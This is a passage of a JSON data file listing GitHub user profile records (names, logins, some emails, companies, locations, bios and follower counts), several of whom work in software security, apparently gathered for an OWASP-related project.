"nest_created_at": "2024-09-11T23:42:35.093Z", + "nest_updated_at": "2024-09-11T23:42:35.093Z", + "name": "", + "login": "howardj99", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23319481?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-11-07T17:59:50Z", + "updated_at": "2024-07-11T21:35:18Z", + "node_id": "MDQ6VXNlcjIzMzE5NDgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1538, + "fields": { + "nest_created_at": "2024-09-11T23:42:39.255Z", + "nest_updated_at": "2024-09-22T18:49:31.166Z", + "name": "Eliot Lear", + "login": "elear", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1016623?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 19, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2011-08-31T10:28:52Z", + "updated_at": "2024-08-31T13:10:37Z", + "node_id": "MDQ6VXNlcjEwMTY2MjM=", + "bio": "IoT scaredy cat. Jack of all CS trades, and master of none.\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1539, + "fields": { + "nest_created_at": "2024-09-11T23:42:40.429Z", + "nest_updated_at": "2024-09-11T23:42:40.429Z", + "name": "Dcentrica", + "login": "dcentrica", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40150397?v=4", + "company": "Dcentrica", + "location": "New Zealand", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 3, + "public_repositories_count": 21, + "created_at": "2018-06-10T20:12:33Z", + "updated_at": "2024-07-19T22:27:08Z", + "node_id": "MDQ6VXNlcjQwMTUwMzk3", + "bio": "Decentralised systems for a centralised world.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1540, + "fields": { + "nest_created_at": "2024-09-12T00:07:23.465Z", + "nest_updated_at": "2024-09-12T00:07:23.465Z", + "name": "Adam Cmiel", + "login": "chmeliik", + "email": "acmiel@redhat.com", + "avatar_url": "https://avatars.githubusercontent.com/u/38193343?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 7, + "public_repositories_count": 85, + "created_at": "2018-04-08T22:00:32Z", + "updated_at": "2024-07-19T12:05:24Z", + "node_id": "MDQ6VXNlcjM4MTkzMzQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1541, + "fields": { + "nest_created_at": "2024-09-12T00:07:24.319Z", + "nest_updated_at": "2024-09-22T19:42:32.893Z", + "name": "Marlon Pina Tojal", + "login": "fnxpt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1815240?v=4", + "company": "Backbase", + "location": "Amsterdam, The Netherlands", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 17, + "public_gists_count": 2, + "public_repositories_count": 106, + "created_at": "2012-06-04T13:36:22Z", + "updated_at": "2024-09-14T11:27:32Z", + "node_id": "MDQ6VXNlcjE4MTUyNDA=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1542, + "fields": { + "nest_created_at": "2024-09-12T00:07:41.816Z", + "nest_updated_at": "2024-09-12T00:07:54.274Z", + "name": "Daniel B", + "login": "bardenstein", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/862262?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2011-06-20T17:21:52Z", + "updated_at": "2023-12-06T01:10:47Z", + "node_id": "MDQ6VXNlcjg2MjI2Mg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1543, + "fields": { + "nest_created_at": "2024-09-12T00:07:44.336Z", + "nest_updated_at": "2024-09-12T00:07:44.336Z", + "name": "", + "login": "bhermida", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/143737534?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-08-31T16:16:20Z", + "updated_at": "2023-08-31T16:16:20Z", + "node_id": "U_kgDOCJFCvg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1544, + "fields": { + "nest_created_at": "2024-09-12T00:07:50.943Z", + "nest_updated_at": "2024-09-12T00:07:50.943Z", + "name": "NickVido", + "login": "nickvido", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/676027?v=4", + "company": "Finite State", + "location": "Columbus, OH", + "collaborators_count": 0, + "following_count": 114, + "followers_count": 32, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2011-03-17T21:58:49Z", + "updated_at": "2024-08-06T01:35:18Z", + "node_id": "MDQ6VXNlcjY3NjAyNw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1545, + "fields": { + "nest_created_at": "2024-09-12T00:07:59.288Z", + "nest_updated_at": "2024-09-12T00:07:59.288Z", + "name": "Moritz Marseu", + "login": "mmarseu", + "email": "moritz.marseu@festo.com", + "avatar_url": "https://avatars.githubusercontent.com/u/47556460?v=4", + "company": "Festo Didactic SE", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2019-02-12T09:02:22Z", + "updated_at": "2024-09-09T06:32:13Z", + "node_id": "MDQ6VXNlcjQ3NTU2NDYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1546, + "fields": { + "nest_created_at": "2024-09-12T00:08:01.757Z", + "nest_updated_at": "2024-09-12T00:08:01.757Z", + "name": "Ben Spiller", + "login": "ben-sag", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84027153?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-05-11T14:12:55Z", + "updated_at": "2024-04-22T08:59:38Z", + "node_id": "MDQ6VXNlcjg0MDI3MTUz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1547, + "fields": { + "nest_created_at": "2024-09-12T00:08:09.665Z", + "nest_updated_at": "2024-09-12T00:08:09.665Z", + "name": "Nathan Naveen", + "login": "nathannaveen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42319948?v=4", + "company": "@kusaridev", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 18, + "public_gists_count": 9, + "public_repositories_count": 60, + "created_at": "2018-08-12T14:54:21Z", + "updated_at": "2024-09-09T12:06:38Z", + "node_id": "MDQ6VXNlcjQyMzE5OTQ4", + "bio": "Software Engineer / 12th Grader", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1548, + "fields": { + "nest_created_at": "2024-09-12T00:08:37.179Z", + "nest_updated_at": "2024-09-12T00:08:37.179Z", + "name": "Brian Williams", + "login": "Brcrwilliams", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22383546?v=4", + "company": "GitLab", + "location": "Austin, Texas, USA", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 6, + "public_gists_count": 5, + "public_repositories_count": 29, + "created_at": "2016-09-23T01:15:21Z", + "updated_at": "2024-07-16T00:41:14Z", + "node_id": "MDQ6VXNlcjIyMzgzNTQ2", + "bio": "Container Security, Software Supply Chain Security, Cryptography", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1549, + "fields": { + "nest_created_at": "2024-09-12T00:08:41.639Z", + "nest_updated_at": "2024-09-12T00:08:41.639Z", + "name": "", + "login": "pjdowner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6304954?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-01-02T17:00:15Z", + "updated_at": "2024-09-10T14:17:49Z", + "node_id": "MDQ6VXNlcjYzMDQ5NTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1550, + "fields": { + "nest_created_at": "2024-09-12T00:08:42.474Z", + "nest_updated_at": "2024-09-12T00:08:42.474Z", + "name": "Gernot Hillier", + "login": "gernot-h", + "email": "gernot.hillier@siemens.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2518769?v=4", + "company": "Siemens AG, Technology, Linux Expert Center", + "location": "Munich", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 27, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2012-10-09T09:18:50Z", + "updated_at": "2024-09-03T05:57:11Z", + "node_id": "MDQ6VXNlcjI1MTg3Njk=", + "bio": "Open Source enthusiast. Member of Linux Expert Center @ Siemens. Contributor to FHEM and OpenStreetMap.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1551, + "fields": { + "nest_created_at": "2024-09-12T00:08:44.149Z", + "nest_updated_at": "2024-09-12T00:08:44.149Z", + "name": "", + "login": "mschusterbsi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/169141269?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-05-07T08:44:26Z", + "updated_at": "2024-08-12T08:13:12Z", + "node_id": "U_kgDOChTkFQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1552, + "fields": { + "nest_created_at": "2024-09-12T00:08:45.026Z", + "nest_updated_at": "2024-09-22T19:40:36.170Z", + "name": "Maximilian Combüchen", + "login": "mcombuechen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1739114?v=4", + "company": "Snyk Ltd.", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2012-05-14T20:14:38Z", + "updated_at": "2024-09-19T15:07:41Z", + "node_id": "MDQ6VXNlcjE3MzkxMTQ=", + "bio": "Software Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1553, + "fields": { + "nest_created_at": "2024-09-12T00:08:46.269Z", + "nest_updated_at": "2024-09-12T00:08:46.269Z", + "name": "xavier zebier", + "login": "tixu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/824870?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 4, + "public_gists_count": 14, + "public_repositories_count": 70, + "created_at": "2011-06-02T07:54:00Z", + "updated_at": "2024-08-29T09:47:58Z", + "node_id": "MDQ6VXNlcjgyNDg3MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1554, + "fields": { + "nest_created_at": "2024-09-12T00:08:47.492Z", + "nest_updated_at": "2024-09-12T00:08:47.492Z", + "name": "", + "login": "volkdm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1552419?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2012-03-19T10:40:12Z", + "updated_at": "2024-07-10T09:33:27Z", + "node_id": "MDQ6VXNlcjE1NTI0MTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1555, + "fields": { + "nest_created_at": "2024-09-12T00:08:52.258Z", + "nest_updated_at": "2024-09-12T00:08:52.258Z", + "name": "", + "login": "benjsc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2476838?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2012-10-03T05:25:34Z", + "updated_at": "2024-08-12T21:39:43Z", + "node_id": "MDQ6VXNlcjI0NzY4Mzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1556, + "fields": { + "nest_created_at": "2024-09-12T00:08:53.531Z", + "nest_updated_at": "2024-09-12T00:08:53.531Z", + "name": "Ria Schalnat", + "login": "Pizza-Ria", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46799628?v=4", + "company": "@HPE", + "location": "Seattle, Washington", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2019-01-17T23:14:46Z", + "updated_at": "2024-09-10T15:38:10Z", + "node_id": "MDQ6VXNlcjQ2Nzk5NjI4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1557, + "fields": { + "nest_created_at": "2024-09-12T00:09:14.384Z", + "nest_updated_at": "2024-09-12T00:09:14.384Z", + "name": "William Bartholomew", + "login": "iamwillbar", + "email": "wdb@willbar.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3266447?v=4", + "company": "@microsoft ", + "location": "Issaquah, WA", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 59, + "public_gists_count": 6, + "public_repositories_count": 10, + "created_at": "2013-01-14T15:44:05Z", + "updated_at": "2024-08-20T23:54:21Z", + "node_id": "MDQ6VXNlcjMyNjY0NDc=", + "bio": "He/him, Australian-born, USA-residing Principal Security Strategist - Cybersecurity Policy at Microsoft. Friction fighter.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1558, + "fields": { + "nest_created_at": "2024-09-12T00:09:19.889Z", + "nest_updated_at": "2024-09-12T00:09:19.889Z", + "name": "Federico Mengozzi", + "login": "fedemengo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19249682?v=4", + "company": "@sysdig", + "location": "$HOME", + "collaborators_count": 0, + "following_count": 259, + "followers_count": 58, + "public_gists_count": 12, + "public_repositories_count": 30, + "created_at": "2016-05-08T10:23:53Z", + "updated_at": "2024-09-10T05:50:26Z", + "node_id": "MDQ6VXNlcjE5MjQ5Njgy", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1559, + "fields": { + "nest_created_at": "2024-09-12T00:09:20.736Z", + "nest_updated_at": "2024-09-12T00:09:20.736Z", + "name": "A.J. Stein", + "login": "aj-stein-nist", + "email": "aj@nist.gov", + "avatar_url": "https://avatars.githubusercontent.com/u/94922603?v=4", + "company": "@usnistgov", + "location": "", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 42, + "public_gists_count": 74, + "public_repositories_count": 162, + "created_at": "2021-11-23T16:40:42Z", + "updated_at": "2024-07-25T15:59:52Z", + "node_id": "U_kgDOBahnaw", + "bio": "", + "is_hireable": false, + "twitter_username": "NISTCyber" + } +}, +{ + "model": "github.user", + "pk": 1560, + "fields": { + "nest_created_at": "2024-09-12T00:09:22.010Z", + "nest_updated_at": "2024-09-22T18:53:38.599Z", + "name": "Olle E. Johansson", + "login": "oej", + "email": "oej@edvina.net", + "avatar_url": "https://avatars.githubusercontent.com/u/20310?v=4", + "company": "Edvina AB - @edvinanet ", + "location": "Sollentuna, Sweden", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 78, + "public_gists_count": 4, + "public_repositories_count": 29, + "created_at": "2008-08-11T19:34:57Z", + "updated_at": "2024-09-10T16:30:31Z", + "node_id": "MDQ6VXNlcjIwMzEw", + "bio": "Working with realtime communication, software supply chain security, PKI and more. Active in IETF, OWASP and in the kamailio.org Open Source SIP server project", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1561, + "fields": { + "nest_created_at": "2024-09-12T00:09:24.108Z", + "nest_updated_at": "2024-09-12T00:09:24.108Z", + "name": "Christopher Gates", + "login": "christophergates", + "email": "chris.gates@velentium.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29800057?v=4", + "company": "Velentium", + "location": "Henderson NV.", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-06-30T14:39:03Z", + "updated_at": "2023-06-21T14:58:15Z", + "node_id": "MDQ6VXNlcjI5ODAwMDU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1562, + "fields": { + "nest_created_at": "2024-09-12T00:09:24.950Z", + "nest_updated_at": "2024-09-22T18:53:39.546Z", + "name": "Benji Visser", + "login": "noqcks", + "email": "benji@xeol.io", + "avatar_url": "https://avatars.githubusercontent.com/u/4740147?v=4", + "company": "Xeol", + "location": "Toronto, ON", + "collaborators_count": 0, + "following_count": 108, + "followers_count": 68, + "public_gists_count": 44, + "public_repositories_count": 484, + "created_at": "2013-06-19T16:18:26Z", + "updated_at": "2024-09-18T06:04:11Z", + "node_id": "MDQ6VXNlcjQ3NDAxNDc=", + "bio": "Founder @xeol-io ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1563, + "fields": { + "nest_created_at": "2024-09-12T00:09:30.127Z", + "nest_updated_at": "2024-09-22T19:24:21.999Z", + "name": "SasanLabs", + "login": "SasanLabs", + "email": "preetkaran20@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/55012000?v=4", + "company": "", + "location": "Canada", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2019-09-07T04:51:26Z", + "updated_at": "2024-09-13T16:17:51Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjU1MDEyMDAw", + "bio": "No power on earth can stop an idea whose time has come.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1564, + "fields": { + "nest_created_at": "2024-09-12T00:09:33.308Z", + "nest_updated_at": "2024-09-22T19:39:17.926Z", + "name": "Karan Preet Singh Sasan", + "login": "preetkaran20", + "email": "preetkaran20@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13570884?v=4", + "company": "Microsoft", + "location": "Surrey, BC", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 24, + "public_gists_count": 4, + "public_repositories_count": 31, + "created_at": "2015-07-30T11:33:00Z", + "updated_at": "2024-09-13T18:16:52Z", + "node_id": "MDQ6VXNlcjEzNTcwODg0", + "bio": "OWASP VulnerableApp project lead, Open-Source organisation @SasanLabs, @zaproxy @owasp", + "is_hireable": true, + "twitter_username": "sasan_karan" + } +}, +{ + "model": "github.user", + "pk": 1565, + "fields": { + "nest_created_at": "2024-09-12T00:09:45.141Z", + "nest_updated_at": "2024-09-22T18:53:44.114Z", + "name": "Kushal Singh", + "login": "kushalsng", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59888324?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 33, + "created_at": "2020-01-14T17:40:45Z", + "updated_at": "2024-08-26T13:37:06Z", + "node_id": "MDQ6VXNlcjU5ODg4MzI0", + "bio": "Software Engineer | MERN stack enthusiast | Hacktoberfest 2022 winner", + "is_hireable": false, + "twitter_username": "kushalsng" + } +}, +{ + "model": "github.user", + "pk": 1566, + "fields": { + "nest_created_at": "2024-09-12T00:09:55.549Z", + "nest_updated_at": "2024-09-22T18:53:48.549Z", + "name": "Amrendra Nath ", + "login": "amrendranath", + "email": "cool.amrendrasrivastav@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/46886429?v=4", + "company": "Genpact", + "location": "India", + "collaborators_count": 0, + "following_count": 30, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 43, + "created_at": "2019-01-21T08:28:06Z", + "updated_at": "2024-06-08T14:07:08Z", + "node_id": "MDQ6VXNlcjQ2ODg2NDI5", + "bio": "Creative and adaptable Front-End Developer with 6+ years of experience building stable websites and apps in fast-paced, collaborative environments.", + "is_hireable": false, + "twitter_username": "amrendranath26" + } +}, +{ + "model": "github.user", + "pk": 1567, + "fields": { + "nest_created_at": "2024-09-12T00:10:05.673Z", + "nest_updated_at": "2024-09-22T18:53:47.600Z", + "name": "Justin Hong", + "login": "Dripcoding", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65139698?v=4", + "company": "Twilio", + "location": "Seattle Washington", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2020-05-10T23:44:42Z", + "updated_at": "2024-08-13T22:13:21Z", + "node_id": "MDQ6VXNlcjY1MTM5Njk4", + "bio": "Full stack software developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1568, + "fields": { + "nest_created_at": "2024-09-12T00:10:20.200Z", + "nest_updated_at": "2024-09-22T18:53:53.339Z", + "name": "", + "login": "DenisPodgurskii", + "email": "denis.podgurskiy@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/197029?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 23, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2010-02-04T19:56:38Z", + "updated_at": "2024-08-23T08:20:24Z", + "node_id": "MDQ6VXNlcjE5NzAyOQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1569, + "fields": { + "nest_created_at": "2024-09-12T00:10:24.225Z", + "nest_updated_at": "2024-09-22T19:21:42.406Z", + "name": "DSecure.me", + "login": "DSecureMe", + "email": "contact@dsecure.me", + "avatar_url": "https://avatars.githubusercontent.com/u/56408412?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2019-10-10T17:44:15Z", + "updated_at": "2021-04-08T15:21:57Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjU2NDA4NDEy", + "bio": "DSecure.me is a group of people connected by a common passion - security.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1570, + "fields": { + "nest_created_at": "2024-09-12T00:10:27.387Z", + "nest_updated_at": "2024-09-22T19:21:45.944Z", + "name": "Michał Walkowski", + "login": "mwalkowski", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/673031?v=4", + "company": "", + "location": "Poland", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 26, + "public_gists_count": 6, + "public_repositories_count": 11, + "created_at": "2011-03-16T12:54:33Z", + "updated_at": "2024-09-04T08:08:20Z", + "node_id": "MDQ6VXNlcjY3MzAzMQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "walkowskimichal" + } +}, +{ + "model": "github.user", + "pk": 1571, + "fields": { + "nest_created_at": "2024-09-12T00:10:32.951Z", + "nest_updated_at": "2024-09-22T19:21:41.033Z", + "name": "", + "login": "Kraxi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1633952?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 4, + "public_repositories_count": 5, + "created_at": "2012-04-11T17:32:54Z", + "updated_at": "2024-06-29T21:09:30Z", + "node_id": "MDQ6VXNlcjE2MzM5NTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1572, + "fields": { + "nest_created_at": "2024-09-12T00:10:37.452Z", + "nest_updated_at": "2024-09-22T19:21:34.380Z", + "name": "", + "login": "danhgh2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92416927?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-10-13T03:15:16Z", + "updated_at": "2023-10-06T12:39:36Z", + "node_id": "U_kgDOBYIrnw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1573, + "fields": { + "nest_created_at": "2024-09-12T00:10:44.003Z", + "nest_updated_at": "2024-09-22T19:21:39.243Z", + "name": "", + "login": "codessensei", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66494203?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-06-05T20:17:29Z", + "updated_at": "2024-08-26T19:23:49Z", + "node_id": "MDQ6VXNlcjY2NDk0MjAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1574, + "fields": { + "nest_created_at": "2024-09-12T00:10:53.456Z", + "nest_updated_at": "2024-09-22T19:21:44.910Z", + "name": "", + "login": "AppletonByte", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68258004?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2020-07-14T01:05:14Z", + "updated_at": "2024-09-06T12:10:37Z", + "node_id": "MDQ6VXNlcjY4MjU4MDA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1575, + "fields": { + "nest_created_at": "2024-09-12T00:11:05.273Z", + "nest_updated_at": "2024-09-22T20:28:58.045Z", + "name": "Matt Stanchek", + "login": "xpert98", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7390513?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-04-24T01:59:28Z", + "updated_at": "2024-09-06T16:22:31Z", + "node_id": "MDQ6VXNlcjczOTA1MTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1576, + "fields": { + "nest_created_at": "2024-09-12T00:11:26.432Z", + "nest_updated_at": "2024-09-22T19:22:39.754Z", + "name": "OWASP PurpleTeam", + "login": "purpleteam-labs", + "email": "info@purpleteam-labs.com", + "avatar_url": "https://avatars.githubusercontent.com/u/40907648?v=4", + "company": "", + "location": "New Zealand (Aotearoa)", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 54, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2018-07-07T05:08:54Z", + "updated_at": "2021-09-20T03:10:29Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjQwOTA3NjQ4", + "bio": "Web Security Regression Testing CLI & SaaS for your build pipeline", + "is_hireable": false, + "twitter_username": "OWASPPurpleTeam" + } +}, +{ + "model": "github.user", + "pk": 1577, + "fields": { + "nest_created_at": "2024-09-12T00:11:54.366Z", + "nest_updated_at": "2024-09-12T00:11:54.366Z", + "name": "Antonette Caldwell", + "login": "acald-creator", + "email": "pullmana8@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18711313?v=4", + "company": "", + "location": "Louisiana", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 23, + "public_gists_count": 1, + "public_repositories_count": 118, + "created_at": "2016-04-28T02:12:44Z", + "updated_at": "2024-09-08T23:56:15Z", + "node_id": "MDQ6VXNlcjE4NzExMzEz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1578, + "fields": { + "nest_created_at": "2024-09-12T00:11:54.779Z", + "nest_updated_at": "2024-09-12T00:11:54.779Z", + "name": "Lakshay Tyagi", + "login": "imlakshay08", + "email": "tyagilakshay119@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/77228428?v=4", + "company": "@be-procloud", + "location": "New Delhi, India", + "collaborators_count": 0, + "following_count": 98, + "followers_count": 54, + "public_gists_count": 1, + "public_repositories_count": 87, + "created_at": "2021-01-10T10:07:45Z", + "updated_at": "2024-09-05T12:31:45Z", + "node_id": "MDQ6VXNlcjc3MjI4NDI4", + "bio": "Open source enthusiast || Full stack developer || Ruby On Rails || JAVA || Talk is cheap. Show me the code.", + "is_hireable": true, + "twitter_username": "imLakshay08" + } +}, +{ + "model": "github.user", + "pk": 1579, + "fields": { + "nest_created_at": "2024-09-12T00:12:01.261Z", + "nest_updated_at": "2024-09-22T19:21:57.589Z", + "name": "Yuvaraj Yadav", + "login": "yuvaraj119", + "email": "yuvaraj119@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10301575?v=4", + "company": "", + "location": "Portland, OR", + "collaborators_count": 0, + "following_count": 48, + "followers_count": 44, + "public_gists_count": 2, + "public_repositories_count": 29, + "created_at": "2014-12-26T06:23:02Z", + "updated_at": "2024-09-04T11:26:06Z", + "node_id": "MDQ6VXNlcjEwMzAxNTc1", + "bio": "Developer\r\nhttps://yuvaraj119gmailcom.itch.io/\r\n", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1580, + "fields": { + "nest_created_at": "2024-09-12T00:13:31.803Z", + "nest_updated_at": "2024-09-22T19:22:44.858Z", + "name": "The OAG Development Project", + "login": "The-OAG-Development-Project", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/157876698?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2024-01-27T07:51:13Z", + "updated_at": "2024-01-27T07:53:02Z", + "node_id": "O_kgDOCWkB2g", + "bio": 